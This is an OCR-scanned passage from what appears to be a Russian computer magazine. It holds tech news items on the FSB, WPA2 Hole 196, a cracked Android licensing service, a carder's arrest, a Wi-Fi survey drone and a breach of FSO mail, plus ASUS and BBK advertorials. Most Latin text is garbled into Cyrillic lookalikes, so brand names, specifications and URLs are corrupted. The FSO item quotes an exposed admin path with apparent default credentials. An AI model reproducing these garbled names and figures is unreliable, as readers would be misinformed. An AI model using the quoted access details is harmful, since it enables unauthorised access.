стартовый «пирог» и начнешь играть можно уже через несколько минут. 

Игры в РІауРазІ; не варез. Это полностью лицензионные игрушки, стой лишь 
разницей отобычных коробочек, что распространяются через прогрессив- 
ный механизм закачки. Заплатить за них можно любым удобным способом 
— СМСкой, через любую платежную систему, включая любимые народом 
терминалы. Что приятно: в среднем игрушка стоит на 20-30 процентов 
дешевле, чем в магазине. Ктомуже перед покупкой любую гамесу можно 
полноценно пощупать. Одну, две, пять — да хоть всю подборку сразу, которые 
предлагаю разработчики на своем сайте. При этом опять не надо полностью 
скачивать их себе на компьютер: закачиваются и устанавливаются лишь 
небольшие части, необходимые длятого, чтобы начать игру. По объему это не 
больше демки или видео с рецензией. 

Компания нетолько создала самутехнологию, но и работаетсо всеми круп- 
ными российскими издателями и представителями зарубежных произво- 
дителей. Каталог постоянно растет, добавляя в себя все больше и больше 
новинок. Что это значит? Очень просто: уже сейчас появляются в электрон- 
ном виде быстрее, чем диски в магазинах. 
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МЕ6АЫЕѴѴ5 



ФСБ НУЖЕН СВОЙ ВШ-КАѴ 



Похоже, Федеральная служба безо- 
пасности России решила, таксказать, 
построить свой Луна-парк. В высшей 
степени безопасный. Одно из техни- 
ческих подразделений ФСБ — войс- 
ковая часть 68240 — объявило конкурс 
на создание оптического носителя, 
«принципиально отличающегося от 
традиционных стандартов СО, ОѴО, 
Віи-гау и др.». Также подразумевается 
разработка устройства для чтения- 
записи таких носителей и технологии 
их изготовления. Известно, что за 27 
месяцев планируется создать опытную 
партию из 200 дисков, и потратить на это 
собираются, ни много ни мало, 45 млн. 
рублей. Требования к носителям 



просты и до боли кое-что напоминают: 
на диск должно умещаться не менее 
25 Гб данных, и храниться информа- 
ция должна не менее 50 лет. Ско- 
рость записи — от 26 Мб/с, скорость 
чтения — от 36 Мб/с. Диаметр будущих 
дисков составит 1 20 мм, толщина — не 
более 1,2 мм, число информационных 
слоев — до четырех. Узнаешь? Да, это 
практически Віи-Нау. Но пользоваться 
Віи-Нау ФСБ нежелает категорически, 
ведь нашим спецслужбам принци- 
пиально важно, чтобы диски не чита- 
лись ни одним из существующих сегод- 
ня устройств, а скорость физического 
уничтожения информации составляла 
не более 60 секунд. 



СВЕТ ВО ТЬМЕ ОТ 
Ю6ІТЕСН 



Любители посидеть за компьютером втемное 
время суток хорошо знают, что выбрать 
клавиатуру с подсветкой — это настоящая 
проблема. Достойных моделей на рынке 
единицы, а ужеслитебе нужен беспроводной 
вариант, то поиски могут совсем затянуться. 
БодйесЬ ѴѴігеІезз ІИитіпаІесІ КеуЬоагсІ К800 от 
компании Бодііесб должна порадовать полу- 
ночников, которые не любят печатать вслепую. 
Беспроводной девайс оснащен сенсором 
движения (стоитубрать руки от клавиатуры 
— «веселые огоньки» погаснут) и датчиком ос- 
вещенности, что позволяетемуавтоматически 
регулировать яркость подсветки и экономить 



заряд аккумуляторов. Ктомуже инженеры 
БодіѣесЬ обещают, что клавиатура сможет 
проработать без подзарядки до 10 дней (кстати, 
заряжаться девайс способен прямо во время 
работы через тігсо-ІІ5В]. Клавиатура комп- 
лектуется крошечным приемником БодіІесЬ 
Ііпііуіпд, использующим технологию Бодііесб 
АбѵапсесІ 2.4 ОН 2 — она практически исклю- 
чаетлаги и отключения. Еще одна приятная 
особенность новинки — система РегІесіБігоке, 
благодаря которой ход изогнутых, эргономич- 
ных клавиш Іпсигѵе Кеуз плавный и тихий. 
Устройство уже можно искать в магазинах, 
рекомендованная цена составляет 1 00 евро. 



19 из 54 антивирусных продуктов провалили тест лаборатории /ігиз 
иііеііп, не сумев получить сертификат В100 Хуже всего себя проявили 

КіпдзоН и Вкі$ ВКАѴ. 





СЛУХИ 0 СНР0МЕ 03 ТАВІ.ЕТ 



По Сети расползаются слухи о скором появле- 
нии планшетного ПК на базе С Ь готе 05. Нача- 
ло пересудам положил ресурс сіоѵѵпіоасіздиасі. 
сот , на котором была опубликована запись, 
рассказывающая, что, по информации некоего 
закрытого источника, компания НТО уже вовсю 
занимается разработкой СЕ го те 05 ТаЫеІ. 
Напомним, что именно НТО делала для «Гугла» 
Ыехиз Опе.такчто предположение, что они 
же займутся планшетом, — вполне логично. 

Но парни с 0оѵѵпІоасІ5диасІ не ограничились 
одним лишь именем производителя — еще они 
сообщили, что планшетякобы будет выпущен 



совместно стелекоммуникационной компа- 
нией Ѵегігоп и в продажу поступитуже 26 но- 
ября текущего года! На 0оѵѵпІоасІ5диасІ даже 
описали железо, которым предположительно 
будет укомплектована новинка, но очень быс- 
тро выяснилось, что это были лишь домыслы 
автора текста — источник не называл сайту 
ничего конкретного, кроме сроков и имени 
производителя. Не окажется ли ложной и эта 
информация, пока неясно: Ооодіе и Ѵегігоп си- 
туацию никак не комментируют. Зато команда 
сайта Епдабдеі попыталась подтвердить или 
опровергнуть приведенные БоѵѵпІоасІ5диасІ 




«факты», обратившись к собственному источ- 
нику. Он утверждает, что продажа С Его те 05 
планшетов начнется никак не раньше 201 1 
года. 



► 012 
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АШОГО-СМАРТФОН ОШ 

Компания 1_б выпустила в продажу 
новый смартфон с Апсігоісі 1 .6 на 
борту — Ю Оріітиз (6Т540). Кто-то 
возможно заметит: «Бодают! Уже 
вот-вотЗ.О версия АпбгоісГа выйдет, 
а тут наста ким старьем пичкают». 

Но тут вопрос в цене устройства: 
она составляет всего 8.990 рублей. 

Н и ка ко го « п од в оха » з д е с ь н ет, 
просто Апбгоіб-девайсы понемногу 
дешевеют:]. За эти деньги ты полу- 
чишь полноценный коммуникатор 
на базе процессора Оиаісотт 
М5М7227 с частотой 600 МГц, с 200 
Мб памяти и резистивным ТЕТ-эк- 
раном с диагональю 3.0” (320x480). 

Девайсоснащен тісгоІІЗВ, ѴѴі-РІ, 

ВІиеіооШ 2.1+ЕОВ (А20Р), РМ-ра- 
дио и имеет слот тісгоЗО (2 Гб 
в комплекте, поддержка до 32 Гб]. 

Для любителей снимать все вокруг 
имеется встроенная камера: 3 Мп 
с автофокусом, поддержкой геотэг- 
гинга и функцией распознавания 
лица. Что касается версии АпбгоісГа 
на борту, то ее, вероятно, можно бу- 
детобновитьс помощью прошивки. 




ЗАЩИТА АН0К0Ш 
ПРОДЕРЖАЛАСЬ 



НЕДОЛГО 

«Як 

■ I В 




Меньше месяца потребо- 
валось хакеру по имени 
Джастин Кейс Ризбп Сазе] 
на взлом новой системы 
Апсігоісі Ысепзіпд Зегѵісе, 
призванной защитить 
Апбгоіб-приложения от 
нелегального распростра- 
нения. Принцип работы 
Ысепзіпд Зегѵісе прост — 
смартфон через определен- 
ные промежутки времени 



связывается с сервером 
Соодіе и проверяет, все 
ли установленные на нем 
приложения легальны. 

Если система обнаруживает 
что-то подозрительное, 
приложение либо сразу 
становится неработоспо- 
собным, либо прекращает 
функционировать через 
заданное число дней (за- 
висит от выбора разработ- 
чика]. Джастин же написал 
небольшой патч, который 
заставляет систему пове- 
рить, что все установленные 
на смартфоне приложения 
легальны. Подробный 
результат своих исследова- 
ний и принцип работы патча 
хакер опубликовал на сайте 
ѵѵѵѵѵѵ.апсігоісіроіісе.сопп в на- 
дежде, что боодіе исправит 
свою оплошность. 



Крупное слияние на западном рынке: компания Іпіеі приобрела компанию 
МсАТее вместе со всеми ее шестью тысячами сотрудников и одним, 
неповторимым Крисом Касперски, за $7,68 млрд. 

В ѴѴРА2 ОБНАРУЖИЛИ «ДЫРКУ» 




Команда независимых исследователей, обитающая под крылом компа- 
нии АігТідЫ ЫеГ/ѵогкз, нашла уязвимость в столпе защиты ѴѴі-Еі-сетей 
— протоколе шифрования данных ѴѴРА2. Подвержены уязвимости, полу- 
чившей имя Норе 196, все сети, совместимые со стандартом ІЕЕЕ802.1 1 
(Веѵізіоп, 2007]. Суть в следующем: ѴѴРА2- прото кол используетдва типа 
ключей: РаігѵѵізеТгапзіепІ: Кеу (РТК], уникальный для каждого клиента, 
для защиты личного трафика, и СгоирТетрогаІ Кеу (6ТК), помогающий 
отличить од ну сеть от другой и предназначенный для шифрования 
бродкаст-трафика. Как выяснилось, РТК способны обнаруживать спуфинг 
адресов и перехват данных, а вот ОТК— нет. Кстати, название Ноіе 196, 
взялось нес потолка — дело в том, что проблема ключей СТК описана на 
196 странице стандарта ІЕЕЕ 802.1 1! Да-да, она была там все последние 
годы. Использовать брешь можно при помощи атаки типа Мап-іп-Ше- 
ті(Ме — пользователь, авторизованный в ѴѴі-Еі-сети, воспользовавшись 
эксплойтом, может перехватывать данные, передаваемые другими 
юзерами этой сети. И это лишь верхушка айсберга — исследователи 
подчеркивают, что возможны и другие варианты атак, а также различ- 
ные неприятные вещи вроде подмены МАС-адресов. Но, тем не менее, 
команда все равно намерена обнародовать эксплойт, дабы с ним смогли 
ознакомиться все желающие, а регулирующие органы получили возмож- 
ность внести в ѴѴРА2 поправки. Ознакомиться с подробностями можно по 
адресу: ѵѵѵѵѵѵ.аігбдЫпеІѵѵогк5.сопп/ѵѵра2-бо[е1 96 
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МЕ6АЫЕѴѴ5 



ЭХО САМЕКРІ.АМЕТ 



Уже много лет прошло с момента закрытия леген- 
дарного кардерского сайта сагбегріапеі.сот (СС 
приказал долго жить еще в 2004 году), но членов 
бывшей «семьи» полиция и спецслужбы разных 
стран мира ловят до сих пор. Та к французская по- 
лиция задержала в аэропорту Ниццы 27-летнего 
Владислава Хорохорина — выходца из России, 
гражданина Израиля и Украины. Последние пару 
летХорохоркина, известного в Сети как ВабВ, 
активно искали спецслужбы США. По их инфор- 
мации, ВабВ имел самое прямое отношение к 
почившей СС иторговал секретными данными о 
кредитных картах и банковских счетах. Кардеру 
заочно были вынесены обвинения в финансовых 



махинациях с использованием устройств досту- 
па, а также в воровстве при отягчающих обстоя- 
тельствах с использованием чужих персональ- 
ныхданных. В итоге вычислили Владислава 
через Сеть. Один из агентов Секретной службы 
СШАсыграл роль покупателя и приобрел у кар- 
дера данные о паре ворованных кредиток. Да, 
«Планета»давнозакрылась, но ВабВтаки не 
оставил свой «бизнес» — он держал в инете пару 
сайтов с предложениями о продаже, оставлял 
объявления на хакерских ресурсах и такдалее. 
Теперь, когда Владислава арестовали, емутакже 
предъявили обвинения в мошенничестве и 
махи нациях с банковскими данными и в краже 




с отягчающими обстоятельствами. По первой 
статье Хорохоркинугрозиттюремное заключение 
сроком до 10 лет и штраф в размере 250 тысяч 
долларов, а вторая статья добавляет к сроку 
заключения еще 2 года, а ксумме штрафа — еще 
250тысяч американскихдензнаков. 



ОБЛЕТ ѴѴГЕГСЕТЕЙ НА БРЕЮЩЕМ ПОЛЕТЕ 



Не успели мы рассказать тебе о классном квадрокоптере Раггоі 
АВ.Бгопе, который управляется при помощи іРбопе, какпоявилась 
новость о другом интересном дроне. Какизвестно, в корыстных целях 
можно использовать практически все, был бы «нужный» склад ума. Воту 
чуваков, создавших сайт ѵѵѵѵѵѵ.гаЬЫі-ЬоІе.огд . склад ума явно подходя- 
щий :). Эти парни собрали беспилотный аппарат, способный облетать 
территорию по заданному маршруту и при этом собирать информацию 
о ѴѴі-Рі-сетях! За основу была взята модель МиГ-23, к которой добавили 
комп Ѵіа Еріа Рісо ІТХ РС (500 МГц Ѵіа С7, 1 Гб РАМ с ВаскІгаск4 на борту) 
и наладили систему автоматического пилотирования АгбиРіІоІ. Система 
поддерживает связь наземной станции с базовой в режиме реального 
времени, посредством РРР оѵегЗЗН тоннеля. Роль наземной станции 
выполняет комп с программой АгбиЗіаІіоп, которая обсчитывает всюте- 
леметрическую информацию. Беспилотникоснащается также Ебде/36 
модемом, что позволяетуправлять процессом удаленно, излюбойточки 
планеты. В воздухе ѴѴА5Р (ѴѴі-Еі АегіаІЗигѵеіІІапсе Ріаібогт] может на- 
ходиться 30-45 минут, и максимальная высота, на которую он способен 
подняться, составляет почти 7 метров. Но главная фишка, конечно, 
заключается в том, что дрону можно задать 0Р5-координаты, и он сам, 



автоматически, облетит нужные места, «просканируетэфир» и соберет 
информацию. ЗаинтригованЗТогда спешим порадовать — поуказан- 
ному выше адресуты найдешь кучу подробностей и отличную подборку 
ссылок потеме «как мне построить такой же аппарат?». Кстати, Ооодіе 
недавно закупил подобные беспилотники у компании Місгобгопез. 
Аппараты планируется использовать для автоматических полетов по 
заданным маршрутам и фотосъемки. Полученные данные должны при- 
годиться в Ооодіе Еагіб и Ооодіе Марз. 




Исследование 1аггі$ Іпіегасііѵе выявило, что, увольняясь с работы, 

49 % американцев и % великобританцев не прочь прихватить с собой 
конфиденциальные файлы компании. 



ЛЕГКИМ ДВИЖЕНИЕМ РУКИ ІРАО СТАНОВИТСЯ НЕТБУКОМ 




Оченьлюбопытный аксессуар для іРасІ разработала компания 
ЗЬепгбеп Раоіиу Зііісопе ТесГіпоІоду. Футляр ВБ-ВКВ76, 
выполненный в виде папки, нетолько защитит«яблочный» 
планшетникот царапин и потертостей, но благодаря беспро- 
водной (Віиеіооіб) ОѴѴЕРТУ-клавиатуре превратит і Ра б в пол- 
ноценный ноутбук. Для быстрого подключения клавиатуры к 
планшету даже предусмотрен специальный хоткей. Зарядить 
«папочку» можно при помощи стандартного кабеля Арріе с 
док-коннектором, время полного заряда аккумулятора -4-4,5 
часа. Время работы клавиатуры от одного заряда в режиме 
ожидания составитоколо 100 дней, и при непрерывной работе 
— до 90 часов. Устройство должно поступить в продажу до 
конца года, по ориентировочной цене $90. 
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ПОЧТУ ФСО РОССИИ «ВСКРЫЛИ» 



Писатьо каждом взломе, дефейсе иутечке информации мы, конечно, 
не можем — слишком уж много таких вещей происходит в сети еже- 
часно, ноумолчать об одном недавнем хаке никак нельзя. В конце 
августа по анонимным имейджбордам со скоростью лесного пожара 
распространилась информация отом, что анонимусам удалось получить 
доступ к системе мониторинга и архивирования корпоративной почты 
«Дозор», расположенной на сервере гзпеГп . Говоря проще, нашли 
дырку, ведущую в архивы электронной почты Федеральной службы 
охраны России, и выглядела онатак: «Ы:1;рз://[ір]/сді-Ьіп/таіп.зст, 
абгттасітіп». Анонимус, правда, утверждал, что по ссылке находится 
архив электронной почты системы оперативно-розыскных мероприятий 
(СО РМ] — программно-технического комплекса, позволяющего получать 
доступ ктелефонным переговорам граждан, обмену 5М5 и электронны- 
ми сообщениями. Разумеется, по линку располагался не архив СОРМ, 
а «всего лишь» внутренняя переписка ФСО. Разработавшая «Дозор» 
компания «Инфосистемы Джет»от комментариев отказывается, однако 
некоторые источники уверяют, что обуязвимости, которой воспользова- 
лисьанонимусы, разработчики знали сзимы текущего года. ФСО, в свою 
очередь, официальнозаявила, что никакой важной информации итем 



более секретных данных в Сеть неутекло (ничего такого поуказанному 
адресу просто не было]. Однако факт остается фактом — на протяжении 
нескольких часов любой юзер могзайти и почитать почтовые архивы 
Федеральной службы охраны. 




Борцы с малварем из компании Аѵа$ получили $100 млн. инвестиций от фирмы 
Зиттіі Рагіпегз. В первую очередь вливание ориентировано на дальнейшее 
развитие бизнес-модели Ггеетіит. 





Іпзрігіпд Іппоѵайоп • Регзізіеп* РеіТесІіоп 




2 Комфортная скорость для всех приложений! , 
Графическая настройка приоритетов 

Удобное перераспределение ширины канала между такими приложениями, 
как голосовые программы, игры, приложения, использующие потоки аудио 
и видео, а также РТР и Р2Р 



его беспроводного комфорта 

Не требует специальных знаний! 

Быстрая настройка беспроводной сети и Іпіегпеі 

Утилита АЗУЗ Е23еіир/ ѴѴРЗ ѴѴііагсІ - настройка защищенной беспроводной сети 
и Іпіегпеі-соединения за 2 минуты с предустановками для провайдеров более 
чем в 100 городах России 












шВ 

л 



3 



Универсальность и функциональность! 
Подключение 118В устройств 

АЗУЗ Е Т Рііе ЗТіагіпд - личный сетевой файл-сервер с доступом через Іпіегпеі 
АЗУЗ Е 1 Ргіпіег Збагіпд - принт-сервер для поддержки одновременной печати 
и сканирования 



ш/\л/.а$и$.ги 



Гарантия 2 года 



Горячая линия: 8-800-100-2787 



шиш 

Многофункциональный 
беспроводной 
маршрутизатор 802 . 1 1 N 



Товар сертифицирован, на правах рекламы. 







РЕКВІІЛЛ 



ТКЕМОСШО 



Ноутбук-бамбук 

Обзор ноутбука АЗІІЗ Ц43.ІС 



Проявляя заботу об окружающей среде, компания А51І5 
создала целую линейку ноутбуков ВатЬоо, воформлении 
корпусов которых пластикзаменен бамбуковыми панелями: 
экологичным и возобновляемым материалом, который, 
ктомуже, оченьстильно и необычно выглядит. С одним 
из представителей обновленной линейки бамбуковых 
ноутов — А5У5 У43Нс — мы и познакомимся сегодня. 




ЭКСТЕРЬЕР 

При осмотре ноутбука первым делом в глаза 
бросается необычный корпус: бамбуковые 
панели и алюминий! Из видимых частей только 
клавиатурные клавиши сделаны из пластика. 
Корпус выглядит стильно и дорого, а бамбук 
очень приятен на ощупь: теплый и слегка шеро- 



ховатый материал. Не должен смущать вопрос о 
его надежности: А51І5 использовала совре- 
менныетехнологии обработки бамбука для 
производства легких, однородных и прочных 
панелей, которые прослужат не меньше, чем 
обычный пластиковый корпус. Разработчики 
А5 II 5 утверждают, что бамбук как материал 



вообще является лучшей заменой пластику: он 
обладает прочностью на растяжение, близкой 
кнекоторым маркам стали! Такчто вопросо 
прочности и надежности можно исключить. 
Размеры ноутбука таковы, чтоутебя не возник- 
нетпроблем при любом его использовании: 14” 
-универсальный сайз. Ноут отлично подойдет 
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ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 

•Процессор: Іпіеі® Соге™ І7-620М с частотой 2,66 ГГц 

•Чипсет: МоЬіІе Іпіеі® НМ55 ЕхргеззСЫрзеІ 

•Память: 4 Гб ОйРЗ 1 066 МГц БОРАМ 

•Дисплей: 14 м , глянцевый, 16:9, 1366x768, І_ЕО-подсветка 

•Видеоадаптер: ЫѴЮІА® беРогсе® 31 ОМ, 1 Гб ООРЗѴРАМ 

•Жесткий диск: 640Гб, 5400 об/мин 

•Интерфейсы: 5-в-1 кардридер (50,ММС,М5,М5-Рго,Х0); Міс; НеафЬопе; ѴОА/Міпі О-зиЬ; 115В 3.0; 2хІІ5В 2.0; Р345; ЕЮМІ 
•Размеры и вес:34. 4x24.1 х 2.20—3. 18см, 2.14 Кг 

•Оптический привод йѴй Зирег МиШ с поддержкой двухслойных дисков 



АКСЕССУАРЫ ДЛЯ НОУТБУКА 




Кабель А51І5 Сгоззііпк создан для быстрого перемеще- 
ния файлов между компьютерами, синхронизации дан- 
ных и организации совместного доступа к интернет-под- 
ключению либо оптическому накопителю. С его помощью 
можно в мгновение ока решить проблему отсутствующего 
ОѴО-привода в нетбуке, расшарить сетевое соединение 
либо переместить большой объем данных между двумя 
компами. Физически всефункционируетчерез интер- 
фейс 135В, а необходимый софт (для ѴѴіпбоѵѵз или МАО] 
размещен на встроенной в кабель флешке объемом 4 Гб. 




ІіЗВ-наушники А51І5 СіпеѴіЬе способны воспроизводить 
глубокие басы и чистые средние и высокие частоты, что 
делает их отличным выбором для игр и просмотра филь- 
мов. Забавной особенностью наушников является систе- 
ма силовой обратной связи, которая усиливает эффект 
от глубоких басов, заставляя наушники вибрироватьв со- 
ответствии стем, что происходит на экране. Грубо говоря, 
если в СЗЗоигсе рядом стобой взорвется граната, ты это 
почувствуешь собственной головой :). 




АЗІІЗ ѴЕСТ0К ВАСКРАСК — удобный рюкзакдля твоего 
ноутбука. Если ты часто таскаешь лэптоп на работу/ 
учебу, либо берешьего в путешествия, вещь незамени- 
мая: не даст ноуту промокнуть под дождем и защитит от 
механических повреждений. Плюс в этом рюкзаке полно 
различных кармашков для мелочей и места для бумаг, 
ключей, дисков и мобильного телефона. Отлично подхо- 
дит для ноутов с диагональю до 16 дюймов. 



какдля работы, так и для развлечений: яркого ЬЕО-дисплея с разреше- 
нием 1366x768 вполне достаточно, чтобы смотреть НО-видео и играть 
в игры. Раскладка клавиатуры выполнена великолепно — аккуратные 
клавиши низкой посадки, пространство между которыми занято декора- 
тивной решеткой. Набирать текст можно в любом режиме и практически 
при любых условиях. Клавиатура лишена миниатюрных или неудобных 
кнопок- все расположено максимальноудобно и за это стоитсказать 
инженерам АЗИЗ отдельное спасибо. Что касается тачпада, то он выде- 
ляется на общем фонетолькоза счетнебольших канавокна его границе, 
по цвету и материалу он не отличается от остального корпуса - бамбук и 
тут. Само собой, поддерживается мультитач, так что традиционно можно 
с помощью двух пальцев перелистывать изображения или ресайзить 
объекты, а с помощьютрех — симулировать работу правой кнопки мыши. 
В целом все работает классно, и никаких претензий не возникло. 

НАЧИНКА 

Что касается начинки —туту АЗІІЗ 11433с полный порядок: наш лэптоп 
оснащен мощным четырехъядерным процессором Іпіеі® Соге™ І7-620М с 



частотой 2,66 ГГц и поддержкой технологии Іпіеі® ТигЬо Вообі, позволяю- 
щей повышать частоту процессора до 3.33 ГГц в моменты, когда необ- 
ходима максимальная производительность , и снижать ее до минимума 
вте моменты, когда высокая мощность не требуется. Ноутбукоснащен 
мощным графическим контроллером І\ІѴЮІА6еЕогсе310М с 1 Гб видеопа- 
мяти ВОВЗѴВАМ. Сайт производителя указывает, что ноутбуки этой серии 
доступны и на процессорах Іпіеі® Соге™ І5 со встроенной графикой СМА 
НО. Наличие в ноутбуке второй интегрированнной видеокарты позволяет 
задействовать одну из самых приятных фишек —технологию ІЧѴЮІА 
Оріітиз, которая сама переключает видеокарты в зависимости от потреб- 
ностей приложений, что весьма благоприятно сказывается на балансе 
производительности и времени работы батареи. 

Естественно, разведен на одной из панелей и НОМІ-выход, атакже при- 
сутствуюттри разъема СІЗВ, втом числе — один 115В 3.0. Стоит вспомнить 
и отехнологии АЗІІЗ ЗирегНуЬгісІ Епдіпе (5НЕ), которая контролирует за- 
груженность системы и интеллектуально регулирует производительность, 
распределяя ее оптимальным образом между процессами. Это позволяет 
улучшить производительность, продлить срок службы батарей и увеличить 
время автономной работы: взависимости от конфигурации, АЗІІЗ 11433с 
способен жить без розетки до 1 0.5 часов! 

ВЫВОДЫ 

Помимо 11433с в линейку АЗ 115 ВатЬооЗегіез входятещедва ноутбука: 
13333с (диагональ 13.3”) и 13533с (15.6”). Ноутбуки довольно схожи и кроме 
диагонали матрицы различаются оптическим приводом: младшая, самая 
тонкая модель 13333с поставляется без него. По своим параметрам и 
свойствам, АЗІІЗ 13433с — настоящий универсал. Он отлично подойдет 
для самого широкого спектра задач: это современный, производи- 
тельный лэптоп суниверсальной диагональю 14”. Он придется по вкусу 
подвижным людям, которые часто берут ноутбук с собой на работу или в 
дорогу. Необычный дизайн и используемые материалы никого не оставят 
равнодушными и гарантированно вызовут интерес окружающих. Отде- 
льной похвалы заслуживает и емкая батарея, которая вместе с эффектив- 
ной технологией контроля производительности обеспечиваетзначитель- 
ное время автономной работы: до 10.5 часов по тестам А5135. 




ТРЕЫОСШВ 



Подробнее о ноутбуках АЗ 13 5 и других гаджетах вы можете узнать в новом 
дискуссионном сообществе на ІгепбсІиЬ.ги. Тгепб Сіи Ь — дискуссионный 
клуб для тех, кто интересуется прогрессом и задумывается о будущем. 
Участники Тгепб СІиЬ обсуждаюттехнические новинки, информаци- 
онныетехнологии, футурологию и другиетемы завтрашнего дня. Тгепб 
Сіи Ь поддерживается компаниями Іпіеі® и А5135 и проводит регулярные 
конкурсы с ценными призами. 

Корпорация Іпіеі, ведущий мировой производитель инновационных полупроводниковых ком- 
понентов, разрабатываеттехнологии, продукцию и инициативы, направленные на постоянное 
повышение качества жизни людей и совершенствование методов их работы. Дополнительную 
информацию о корпорации Іпіеі можно найти на ѴѴеЬ-сервере компании Іпіеі Ыір://ѵѵѵѵѵѵ. 
іпіеі.ги, атакже на сайте ЬіірУ/Ыодз.іпіеІ.сот. Для получения дополнительной информации о 
рейтинге процессоров Іпіеі посетите сайт ѵѵѵѵѵѵ.іпіеі.ги/гаііпд. 
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РЕВВІІЛЛ 



Медиаплееры ВВК 

Что делать, если смотреть кино и любимые сериалы хочется в хорошем качест- 
ве, но не на мониторе компьютера, а на большой диагонали телевизора, с ком- 
фортом развалившись на диване? Ответ прост - если тебе не нужны головная 
боль и путаница проводов, придется раскошелиться на медиаплеер. 



Большим разрешениям - большой экран 

Сегодня втехническиххарактеристиках почти лю- 
бого телевизора можно найти строки «поддержка 
НОТѴ» и «РиН НО». Разрешения высокой четкости 
1 280x720 и 1 920x1080 наконец-то перестали быть 
экзотикой для эстетов и становятся вполне буд- 
ничной штукой. Ничего удивительно тут нет -дай 
любому человеку сравнить картинку в НО и50, и 
вотувидишь, несчастный возопит: «Мои глаза! 

Как я жил раньше?!» и, конечно, сделает выбор в 
пользу НО. 

Однако, увы и ах, если говорить об эфирном 
телевидении - Россия пока находится в процессе 
перехода на цифровой форматтелевещания, ни 
о каком НОТѴ речи нет, в виду чего нам пр иходит- 
ся «наслаждаться» картинкой с соотношением 
сторон 4:3 и посредственным качеством. Смот- 
реть на этот страх можно исключительно и только 
в умеренных дозах, аужо контенте российских 
телеканалов мы вообще лучшеумолчим. 

Учитывая эту печальную ситуацию и тот факт, что 
торренты и файлообменники завалены НОТѴ- и 
ВО-рипами на любой вкус, в голову просто не 
может не закрасться мысль, что на телевизионном 
экране большие разрешения будут выглядеть 
куда более впечатляюще, чем на мониторе. 
Конечно, справедливости ради стоитсказать, 
что помимо «цифры» существуютеще и Віи-гау 

ДИСКИ. 

Но, согласись - скачать фильм, посмотреть его 
и стереть, это куда дешевле, проще и быстрее, 
чем покупать не самые дешевые диски, которые 
потом, ктомуже, будут пылиться на полке годами. 
Вотпоследним-то и обусловлена быстро растущая 
популярность различных мультимедийных проиг- 
рывателей. 

На рынке сейчас представлено множество де- 
вайсов, предназначенных для доставки мульти- 
медийного контента из Сети прямиком на экран 
твоего ТВ. Чтобы помочьтебе сориентироваться 
вэтом изобилии, мы познакомимтебя слинейкой 
отличных НО-медиаплееров от компании ВВК, 
которая уже который год производит«всеядные» 
и доступные устройства на радость синефилам. 



МР0505 

Младшая модель серии придется по вкусутем, кто не собирается обору- 
довать дома навороченный медиацентр, а ищетудобства и простоты в 
работе и настройке. 

Какты могзаметить, МР0505 не «сетевой» девайс - проигрывать 
мультимедийный контент он можеттолько с внешних накопителей, будь 
то флешка, внешний ОЗВ-винт (поддерживаются РАТ, РАТ32 и І\ІТЕ5) 
или карта памяти. Так что если ты ищешь решение, которое можно будет 
«подружить» одомашним файловым хранилищем или компом, лучше 
обрати внимание на модели приведенные ниже. 

МР0505 можно рекомендовать владельцам телевизоров, не имеющих 
ІІЗВ-портов, и тем, кто ищет компактности и минимального функционала 
безлишней переплаты. И пустьфраза про«минимальный функционал» 
тебя не пугает - несмотря на доступную цену, МР0505 поддерживает 
практически любые современные форматы файлов, втом числе МКѴ 
(Маітозка) и МОѴ (Н.264). 




Технические характеристики 

Сеть: Нет 

Разъемы: Н ЮМ 1 1 .3, Композитный видеовыход, Стереофонический ау- 
диовыход, Цифровой коаксиальный аудиовыход, 115В 2.0, Универсальный 
считыватель карт памяти 50/ММС/М5 

Поддерживаемые форматы: 

Видео - МРЕ6-1/2/4, МРЕО-1/2 Р5 (М2Р, МРО), МРЕ6-2, ѴОВ, АѴІ, А5Р, 

ѴѴМѴ, М КѴ (МаТгозка), МОѴ(Н.264), МР4 

Аудио -ААС, М4А, МРЕО аибіо (МР1 , МР2, МРА), ѴѴАѴ, ѴѴМА 

Изображения ШРЕО НЮ, ЭРЕО, ВМР, РЫО 

Другое - 150, ІЕО 

Максимальное разрешение: 1 080р 
ЕШО в комплекте: Нет 
Пульт ДУ: Есть 
Габариты: 121x26x101 



► 018 
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МР0605 МР0705 



Медиапроигрыватель МР0605 предлагает более серьезный функционал и 
способен претендовать на звание «полезнейшего девайса для кинома- 
на». Эта модель нетолько поможеттебе вывести на телеэкран красоты в 
НЭТѴ качестве, но и с готовностью возьметна себятруд по выкачиванию 
из Сети новых киноманских радостей - плеер оснащен встроенным 
менеджером закачек (ВііТоггепІ: и НТТР]. Настройка и подключение 
устройства к роутеру, компу, или напрямую к Сети, предельно просты и не 
займутмного времени. 

Можнотакже напрямую подсоединить к плееру 5АТА-диск (ограничения 
по объему нет], тем более что в та ком случае производитель обещает 
пятикратное ускорение при чтении и записи НБ-контента. 

Еще одной приятной, уже не технической, особенностью девайса являет- 
ся то, что расположить его можно как в горизонтальном, так и в вертикаль- 
ном положении. Сучетомтого, что подавляющее большинство нынешних 
внешних «винтов» стоят на своих подставках вертикально, МР0605 очень 




Старшая модель линейки обладает всеми необходимыми характерис- 
тиками, которыми должно обладать сердце современного домашнего 
медиацентра. 

МР0705 без запинки «прожует» практически любые форматы и кодеки. 
Благодаря менеджеру закачек, МР0705, равно каки его собрат МР0605 
модели, поможеттебе своевременно отследить последние кино-новинки 
в Сети и скачать их. 

Но главная «фишка»девайса втом, что помимоумения общаться с любы- 
ми внешними накопителями, он и сам может выступать в роли хранилища 
файлов - для этого на борту плеера предусмотрено место под внутренний 
жесткий дискЭАТАЗ. 5". Хочешь, поставьтуда скромный накопительна 60- 
80 ГБ, образовав небольшой «перевалочный пункт», а хочешь, установи 
внутрь 1 .5 ТБ и наслаждайся. 




Технические характеристики: 

Сеть: І_АЫ (ЕіЬегпеі] 10/100 Мбит/с 

Разъемы: НБМІ 1 .3, Композитный видеовыход, Компонентный видеовы- 
ход, Стереофонический аудиовыход, Цифровой коаксиальный аудиовы- 
ход, Цифровой оптический аудиовыход, 115В 2.0, МіпіІ)5В, Универсаль- 
ный считыватель карт памяти 5Б/ММС/М5, еЗАТА Нозі 

Поддерживаемые форматы: 

Видео - МРЕ6-1/2/4, МРЕС-1/2 Р5 (М2Р, МР6], МРЕС-2, ѴОВ, АѴІ, А5Е, 

ѴѴМѴ, МКѴІМаІгозка], МОѴ (Н .264], МР4 

Аудио -ААС, М4А, МРЕС аибіо (МР1 , МР2, МРА], ѴѴАѴ, ѴѴМА 

Изображения - 6РЕО НЮ, ЭРЕО, ВМР, РІЧО 

Другое - 150, ІЕО 

Максимальное разрешение: 1 080р 
